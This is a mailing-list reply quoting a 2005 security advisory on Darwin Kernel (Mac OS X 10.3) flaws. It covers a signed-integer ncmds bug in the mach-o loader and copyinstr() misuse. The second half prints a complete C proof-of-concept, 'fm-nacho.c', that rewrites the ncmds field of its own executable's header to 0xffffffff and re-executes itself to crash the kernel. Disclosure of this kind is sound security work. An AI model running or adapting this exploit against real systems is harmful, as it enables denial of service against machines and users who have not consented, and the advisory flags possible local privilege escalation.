<<< Date Index >>>     <<< Thread Index >>>

Re: Darwin Kernel Vulnerability



On Wed, Jan 19, 2005 at 11:53:15AM -0800, nemo@xxxxxxxxxxxxxxxx wrote:
> "moderator: resending this mail since it appears to of got dropped, if not, 
> please ignore this message.
> 
>                      _,'|             _.-''``-...___..--';)
>                      /_ \'.      __..-' ,      ,--...--'''
>                     <\    .`--'''       `     /'
>                     `-';'               ;   ; ;
>                __...--''     ___...--_..'  .;.'
>            fL (,__....----'''       (,..--''  felinemenace.org
> 
>> Program:     Darwin Kernel 7.1
Effects <= Darwin Kernel 7.7.0
Sorry about the rushed advisory.
- nemo 
> Impact:               DoS, Possible local privilege escalation.       
> Discovered:   8th January 2005 by nemo -( nemo @ felinemenace.org )-
> Writeup and exploits:
> 
> 1) Background
> 
> Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3
> Some of the bugs we investigated exist due to lack of input validation in the 
> mach-o 
> loader.
> 
> 2) Description
> 
> In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the 
> most part
> each field is trusted to be acceptable.
> 
> In the mach-o loader code (parse_machfile()) ncmds and offset are both 
> declared as 
> signed integers, however the appropriate structs used to read from the file 
> are 
> unsigned.
> After a little investigation a DoS was quickly written to set ncmds to -1. 
> 
>       ncmds = header->ncmds; 
>                       while (ncmds--) {
> 
> The attached code will cause a denial of service on MacOSX <= 10.3.7
> 
> 3) Notes
> During our audit of the Darwin Kernel many bugs stood out, however we have 
> not 
> had time to follow through on most of them. Something that caught our 
> attention 
> was the misuse of the copyinstr() command. This function will not force a NULL
> character to be appended to the string copied in, however it seems in many 
> cases
> the size passed to the function doesn't take this into account.
> Unfortunately, as security goes, its all about who posts first. 
> http://www.immunitysec.com/downloads/nukido.pdf
> 
> 4) Vendor status/notes/fixes/statements
> Apple have been notified about this bug.
> 
> 5) Exploit
> 
> //---------------------( fm-nacho.c )--------------------------
> /*
>  * DoS for Darwin Kernel Version < 7.5.0
>  * -(nemo@xxxxxxxxxxxxxxx)-
>  * 2005
>  *
>  * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
>  * irc.pulltheplug.org (#social)
>  */
> 
> #include <stdio.h>
> 
> int main(int ac, char **av)
> {
>         FILE *me;
>         int rpl = 0xffffffff;
>         fpos_t pos = 0x10;
>         printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
>         printf("-( nemo@xxxxxxxxxxxxxxx )-\n\n");
>         printf("[+] Opening file for writing.\n");
>         if(!(me = fopen(*av,"r+"))) {
>                 printf("[-] Error opening exe.\n");
>                 exit(1);
>         }
>         printf("[+] Seeking to ncmds.\n");
>         if((fsetpos(me,&pos)) == -1) {
>                 printf("[-] Error seeking to ncmds.\n");
>                 exit(1);
>         }
>         printf("[+] Changing ncmds to 0x%x.\n",rpl);
>         if(fwrite(&rpl,4,1,me) < 1) {
>                 printf("[-] Error writing to file.\n");
>                 exit(1);
>         }
>         fclose(me);
>         printf("[+] Re-executing with modified mach-o header.\n");
>         sleep(5);
>         if(execv(*av,av) == -1 ) {
>                 printf("[-] Error executing %s, please run manually.\n",*av);
>                 exit(1);
>         }
>         exit(0); // hrm
> }
> 
>